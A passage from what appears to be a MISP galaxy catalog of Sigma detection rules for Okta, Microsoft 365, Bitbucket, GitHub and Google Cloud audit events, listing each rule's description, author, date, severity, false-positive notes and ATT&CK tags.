UUID 7899144b-e416-4c28-b0b5-ab8f9e0a541d which can be used as unique global reference for Okta Application Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_application_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Potential Okta Password in AlternateID Field

Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files.

Internal MISP references

UUID 91b76b84-8589-47aa-9605-c837583b82a9 which can be used as unique global reference for Potential Okta Password in AlternateID Field in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/04/03
falsepositive ['Unlikely']
filename okta_password_in_alternateid_field.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.credential_access', 'attack.t1552']
Related clusters

To see the related clusters, click here.

Okta Admin Functions Access Through Proxy

Detects access to Okta admin functions through proxy.

Internal MISP references

UUID 9058ca8b-f397-4fd1-a9fa-2b7aad4d6309 which can be used as unique global reference for Okta Admin Functions Access Through Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal @faisalusuf
creation_date 2023/10/25
falsepositive ['False positives are expected if administrators access these function through proxy legitimatly. Apply additional filters if necessary']
filename okta_admin_activity_from_proxy_query.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.credential_access']

Okta Network Zone Deactivated or Deleted

Detects when an Network Zone is Deactivated or Deleted.

Internal MISP references

UUID 9f308120-69ed-4506-abde-ac6da81f4310 which can be used as unique global reference for Okta Network Zone Deactivated or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Unknown']
filename okta_network_zone_deactivated_or_deleted.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta API Token Created

Detects when a API token is created

Internal MISP references

UUID 19951c21-229d-4ccb-8774-b993c3ff3c5c which can be used as unique global reference for Okta API Token Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Legitimate creation of an API token by authorized users']
filename okta_api_token_created.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence']

Okta MFA Reset or Deactivated

Detects when an attempt at deactivating or resetting MFA.

Internal MISP references

UUID 50e068d7-1e6b-4054-87e5-0a592c40c7e0 which can be used as unique global reference for Okta MFA Reset or Deactivated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/21
falsepositive ['If a MFA reset or deactivated was performed by a system administrator.']
filename okta_mfa_reset_or_deactivated.yml
level medium
logsource.category No established category
logsource.product okta
tags ['attack.persistence', 'attack.credential_access', 'attack.defense_evasion', 'attack.t1556.006']
Related clusters

To see the related clusters, click here.

Okta Policy Modified or Deleted

Detects when an Okta policy is modified or deleted.

Internal MISP references

UUID 1667a172-ed4c-463c-9969-efd92195319a which can be used as unique global reference for Okta Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/12
falsepositive ['Okta Policies being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename okta_policy_modified_or_deleted.yml
level low
logsource.category No established category
logsource.product okta
tags ['attack.impact']

Okta User Session Start Via An Anonymising Proxy Service

Detects when an Okta user session starts where the user is behind an anonymising proxy service.

Internal MISP references

UUID bde30855-5c53-4c18-ae90-1ff79ebc9578 which can be used as unique global reference for Okta User Session Start Via An Anonymising Proxy Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author kelnage
creation_date 2023/09/07
falsepositive ['If a user requires an anonymising proxy due to valid justifications.']
filename okta_user_session_start_via_anonymised_proxy.yml
level high
logsource.category No established category
logsource.product okta
tags ['attack.defense_evasion', 'attack.t1562.006']
Related clusters

To see the related clusters, click here.

Disabling Multi Factor Authentication

Detects disabling of Multi Factor Authentication.

Internal MISP references

UUID 60de9b57-dc4d-48b9-a6a0-b39e0469f876 which can be used as unique global reference for Disabling Multi Factor Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
creation_date 2023/09/18
falsepositive ['Unlikely']
filename microsoft365_disabling_mfa.yml
level high
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

New Federated Domain Added

Detects the addition of a new Federated Domain.

Internal MISP references

UUID 58f88172-a73d-442b-94c9-95eaed3cbb36 which can be used as unique global reference for New Federated Domain Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)
creation_date 2023/09/18
falsepositive ['The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.']
filename microsoft365_new_federated_domain_added_audit.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

New Federated Domain Added - Exchange

Detects the addition of a new Federated Domain.

Internal MISP references

UUID 42127bdd-9133-474f-a6f1-97b6c08a4339 which can be used as unique global reference for New Federated Domain Added - Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Splunk Threat Research Team (original rule), '@ionsor (rule)'
creation_date 2022/02/08
falsepositive ['The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider.']
filename microsoft365_new_federated_domain_added_exchange.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.persistence', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

Activity from Anonymous IP Addresses

Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.

Internal MISP references

UUID d8b0a4fe-07a8-41be-bd39-b14afa025d95 which can be used as unique global reference for Activity from Anonymous IP Addresses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['User using a VPN or Proxy']
filename microsoft365_activity_from_anonymous_ip_addresses.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']
Related clusters

To see the related clusters, click here.

Data Exfiltration to Unsanctioned Apps

Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.

Internal MISP references

UUID 2b669496-d215-47d8-bd9a-f4a45bf07cda which can be used as unique global reference for Data Exfiltration to Unsanctioned Apps in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_data_exfiltration_to_unsanctioned_app.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration', 'attack.t1537']
Related clusters

To see the related clusters, click here.

Suspicious Inbox Forwarding

Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.

Internal MISP references

UUID 6c220477-0b5b-4b25-bb90-66183b4089e8 which can be used as unique global reference for Suspicious Inbox Forwarding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/22
falsepositive ['Unknown']
filename microsoft365_susp_inbox_forwarding.yml
level low
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

Activity Performed by Terminated User

Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.

Internal MISP references

UUID 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee which can be used as unique global reference for Activity Performed by Terminated User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_activity_by_terminated_user.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact']

Logon from a Risky IP Address

Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.

Internal MISP references

UUID c191e2fa-f9d6-4ccf-82af-4f2aba08359f which can be used as unique global reference for Logon from a Risky IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_logon_from_risky_ip_address.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

PST Export Alert Using New-ComplianceSearchAction

Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.

Internal MISP references

UUID 6897cd82-6664-11ed-9022-0242ac120002 which can be used as unique global reference for PST Export Alert Using New-ComplianceSearchAction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2022/11/17
falsepositive ['Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored.']
filename microsoft365_pst_export_alert_using_new_compliancesearchaction.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.collection', 'attack.t1114']
Related clusters

To see the related clusters, click here.

Microsoft 365 - Unusual Volume of File Deletion

Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.

Internal MISP references

UUID 78a34b67-3c39-4886-8fb4-61c46dc18ecd which can be used as unique global reference for Microsoft 365 - Unusual Volume of File Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_unusual_volume_of_file_deletion.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Microsoft 365 - User Restricted from Sending Email

Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.

Internal MISP references

UUID ff246f56-7f24-402a-baca-b86540e3925c which can be used as unique global reference for Microsoft 365 - User Restricted from Sending Email in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_user_restricted_from_sending_email.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1199']
Related clusters

To see the related clusters, click here.

Suspicious OAuth App File Download Activities

Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.

Internal MISP references

UUID ee111937-1fe7-40f0-962a-0eb44d57d174 which can be used as unique global reference for Suspicious OAuth App File Download Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_susp_oauth_app_file_download_activities.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.exfiltration']

Microsoft 365 - Impossible Travel Activity

Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.

Internal MISP references

UUID d7eab125-5f94-43df-8710-795b80fa1189 which can be used as unique global reference for Microsoft 365 - Impossible Travel Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2020/07/06
falsepositive ['Unknown']
filename microsoft365_impossible_travel_activity.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Microsoft 365 - Potential Ransomware Activity

Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.

Internal MISP references

UUID bd132164-884a-48f1-aa2d-c6d646b04c69 which can be used as unique global reference for Microsoft 365 - Potential Ransomware Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author austinsonger
creation_date 2021/08/19
falsepositive ['Unknown']
filename microsoft365_potential_ransomware_activity.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

PST Export Alert Using eDiscovery Alert

Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content

Internal MISP references

UUID 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 which can be used as unique global reference for PST Export Alert Using eDiscovery Alert in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sorina Ionescu
creation_date 2022/02/08
falsepositive ['PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored.']
filename microsoft365_pst_export_alert.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.collection', 'attack.t1114']
Related clusters

To see the related clusters, click here.

Activity from Infrequent Country

Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.

Internal MISP references

UUID 0f2468a2-5055-4212-a368-7321198ee706 which can be used as unique global reference for Activity from Infrequent Country in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_activity_from_infrequent_country.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']
Related clusters

To see the related clusters, click here.

Activity from Suspicious IP Addresses

Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.

Internal MISP references

UUID a3501e8e-af9e-43c6-8cd6-9360bdaae498 which can be used as unique global reference for Activity from Suspicious IP Addresses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/23
falsepositive ['Unknown']
filename microsoft365_from_susp_ip_addresses.yml
level medium
logsource.category No established category
logsource.product m365
tags ['attack.command_and_control', 'attack.t1573']
Related clusters

To see the related clusters, click here.

Bitbucket Unauthorized Access To A Resource

Detects unauthorized access attempts to a resource.

Internal MISP references

UUID 7215374a-de4f-4b33-8ba5-70804c9251d3 which can be used as unique global reference for Bitbucket Unauthorized Access To A Resource in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Access attempts to non-existent repositories or due to outdated plugins. Usually "Anonymous" user is reported in the "author.name" field in most cases.']
filename bitbucket_audit_unauthorized_access_detected.yml
level critical
logsource.category No established category
logsource.product bitbucket
tags ['attack.resource_development', 'attack.t1586']
Related clusters

To see the related clusters, click here.

Bitbucket Global SSH Settings Changed

Detects Bitbucket global SSH access configuration changes.

Internal MISP references

UUID 16ab6143-510a-44e2-a615-bdb80b8317fc which can be used as unique global reference for Bitbucket Global SSH Settings Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_ssh_settings_change_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.t1562.001', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

Bitbucket Secret Scanning Exempt Repository Added

Detects when a repository is exempted from secret scanning feature.

Internal MISP references

UUID b91e8d5e-0033-44fe-973f-b730316f23a1 which can be used as unique global reference for Bitbucket Secret Scanning Exempt Repository Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_secret_scanning_exempt_repository_detected.yml
level high
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket User Permissions Export Attempt

Detects user permission data export attempt.

Internal MISP references

UUID 87cc6698-3e07-4ba2-9b43-a85a73e151e2 which can be used as unique global reference for Bitbucket User Permissions Export Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_user_permissions_export_attempt_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.reconnaissance', 'attack.t1213', 'attack.t1082', 'attack.t1591.004']
Related clusters

To see the related clusters, click here.

Bitbucket Audit Log Configuration Updated

Detects changes to the bitbucket audit log configuration.

Internal MISP references

UUID 6aa12161-235a-4dfb-9c74-fe08df8d8da1 which can be used as unique global reference for Bitbucket Audit Log Configuration Updated in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_log_configuration_update_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket Secret Scanning Rule Deleted

Detects when secret scanning rule is deleted for the project or repository.

Internal MISP references

UUID ff91e3f0-ad15-459f-9a85-1556390c138d which can be used as unique global reference for Bitbucket Secret Scanning Rule Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_secret_scanning_rule_deleted.yml
level low
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket Full Data Export Triggered

Detects when full data export is attempted.

Internal MISP references

UUID 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8 which can be used as unique global reference for Bitbucket Full Data Export Triggered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_full_data_export_triggered.yml
level high
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.t1213.003']
Related clusters

To see the related clusters, click here.

Bitbucket Global Permission Changed

Detects global permissions change activity.

Internal MISP references

UUID aac6c4f4-87c7-4961-96ac-c3fd3a42c310 which can be used as unique global reference for Bitbucket Global Permission Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_permissions_change_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Bitbucket Project Secret Scanning Allowlist Added

Detects when a secret scanning allowlist rule is added for projects.

Internal MISP references

UUID 42ccce6d-7bd3-4930-95cd-e4d83fa94a30 which can be used as unique global reference for Bitbucket Project Secret Scanning Allowlist Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_project_secret_scanning_allowlist_added.yml
level low
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket User Login Failure Via SSH

Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.

Internal MISP references

UUID d3f90469-fb05-42ce-b67d-0fded91bbef3 which can be used as unique global reference for Bitbucket User Login Failure Via SSH in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user wrong password attempts.']
filename bitbucket_audit_user_login_failure_via_ssh_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.t1021.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Bitbucket Unauthorized Full Data Export Triggered

Detects when full data export is attempted an unauthorized user.

Internal MISP references

UUID 34d81081-03c9-4a7f-91c9-5e46af625cde which can be used as unique global reference for Bitbucket Unauthorized Full Data Export Triggered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Unlikely']
filename bitbucket_audit_unauthorized_full_data_export_triggered.yml
level critical
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.resource_development', 'attack.t1213.003', 'attack.t1586']
Related clusters

To see the related clusters, click here.

Bitbucket Global Secret Scanning Rule Deleted

Detects Bitbucket global secret scanning rule deletion activity.

Internal MISP references

UUID e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05 which can be used as unique global reference for Bitbucket Global Secret Scanning Rule Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_global_secret_scanning_rule_deleted.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bitbucket User Details Export Attempt Detected

Detects user data export activity.

Internal MISP references

UUID 5259cbf2-0a75-48bf-b57a-c54d6fabaef3 which can be used as unique global reference for Bitbucket User Details Export Attempt Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user activity.']
filename bitbucket_audit_user_details_export_attempt_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.collection', 'attack.reconnaissance', 'attack.discovery', 'attack.t1213', 'attack.t1082', 'attack.t1591.004']
Related clusters

To see the related clusters, click here.

Bitbucket User Login Failure

Detects user authentication failure events. Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.

Internal MISP references

UUID 70ed1d26-0050-4b38-a599-92c53d57d45a which can be used as unique global reference for Bitbucket User Login Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/02/25
falsepositive ['Legitimate user wrong password attempts.']
filename bitbucket_audit_user_login_failure_detected.yml
level medium
logsource.category No established category
logsource.product bitbucket
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Github Push Protection Disabled

Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules.

Internal MISP references

UUID ccd55945-badd-4bae-936b-823a735d37dd which can be used as unique global reference for Github Push Protection Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_push_protection_disabled.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New Github Organization Member Added

Detects when a new member is added or invited to a github organization.

Internal MISP references

UUID 3908d64a-3c06-4091-b503-b3a94424533b which can be used as unique global reference for New Github Organization Member Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/29
falsepositive ['Organization approved new members']
filename github_new_org_member.yml
level informational
logsource.category No established category
logsource.product github
tags ['attack.persistence', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

Github New Secret Created

Detects when a user creates action secret for the organization, environment, codespaces or repository.

Internal MISP references

UUID f9405037-bc97-4eb7-baba-167dad399b83 which can be used as unique global reference for Github New Secret Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/20
falsepositive ['This detection cloud be noisy depending on the environment. It is recommended to keep a check on the new secrets when created and validate the "actor".']
filename github_new_secret_created.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Github Delete Action Invoked

Detects delete action in the Github audit logs for codespaces, environment, project and repo.

Internal MISP references

UUID 16a71777-0b2e-4db7-9888-9d59cb75200b which can be used as unique global reference for Github Delete Action Invoked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/19
falsepositive ['Validate the deletion activity is permitted. The "actor" field need to be validated.']
filename github_delete_action_invoked.yml
level medium
logsource.category No established category
logsource.product github
tags ['attack.impact', 'attack.collection', 'attack.t1213.003']
Related clusters

To see the related clusters, click here.

Github Outside Collaborator Detected

Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.

Internal MISP references

UUID eaa9ac35-1730-441f-9587-25767bde99d7 which can be used as unique global reference for Github Outside Collaborator Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/20
falsepositive ['Validate the actor if permitted to access the repo.', 'Validate the Multifactor Authentication changes.']
filename github_outside_collaborator_detected.yml
level medium
logsource.category No established category
logsource.product github
tags ['attack.persistence', 'attack.collection', 'attack.t1098.001', 'attack.t1098.003', 'attack.t1213.003']
Related clusters

To see the related clusters, click here.

Github High Risk Configuration Disabled

Detects when a user disables a critical security feature for an organization.

Internal MISP references

UUID 8622c92d-c00e-463c-b09d-fd06166f6794 which can be used as unique global reference for Github High Risk Configuration Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/29
falsepositive ['Approved administrator/owner activities.']
filename github_disable_high_risk_configuration.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

Github Self Hosted Runner Changes Detected

A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.

Internal MISP references

UUID f8ed0e8f-7438-4b79-85eb-f358ef2fbebd which can be used as unique global reference for Github Self Hosted Runner Changes Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/27
falsepositive ['Allowed self-hosted runners changes in the environment.', 'A self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 14 days.', 'An ephemeral self-hosted runner is automatically removed from GitHub if it has not connected to GitHub Actions for more than 1 day.']
filename github_self_hosted_runner_changes_detected.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.impact', 'attack.discovery', 'attack.collection', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1526', 'attack.t1213.003', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Github Secret Scanning Feature Disabled

Detects if the secret scanning feature is disabled for an enterprise or repository.

Internal MISP references

UUID 3883d9a0-fd0f-440f-afbb-445a2a799bb8 which can be used as unique global reference for Github Secret Scanning Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_secret_scanning_feature_disabled.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Outdated Dependency Or Vulnerability Alert Disabled

Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.

Internal MISP references

UUID 34e1c7d4-0cd5-419d-9f1b-1dad3f61018d which can be used as unique global reference for Outdated Dependency Or Vulnerability Alert Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2023/01/27
falsepositive ["Approved changes by the Organization owner. Please validate the 'actor' if authorized to make the changes."]
filename github_disabled_outdated_dependency_or_vulnerability.yml
level high
logsource.category No established category
logsource.product github
tags ['attack.initial_access', 'attack.t1195.001']
Related clusters

To see the related clusters, click here.

Github Push Protection Bypass Detected

Detects when a user bypasses the push protection on a secret detected by secret scanning.

Internal MISP references

UUID 02cf536a-cf21-4876-8842-4159c8aee3cc which can be used as unique global reference for Github Push Protection Bypass Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf)
creation_date 2024/03/07
falsepositive ['Allowed administrative activities.']
filename github_push_protection_bypass_detected.yml
level low
logsource.category No established category
logsource.product github
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Google Cloud DNS Zone Modified or Deleted

Identifies when a DNS Zone is modified or deleted in Google Cloud.

Internal MISP references

UUID 28268a8f-191f-4c17-85b2-f5aa4fa829c3 which can be used as unique global reference for Google Cloud DNS Zone Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
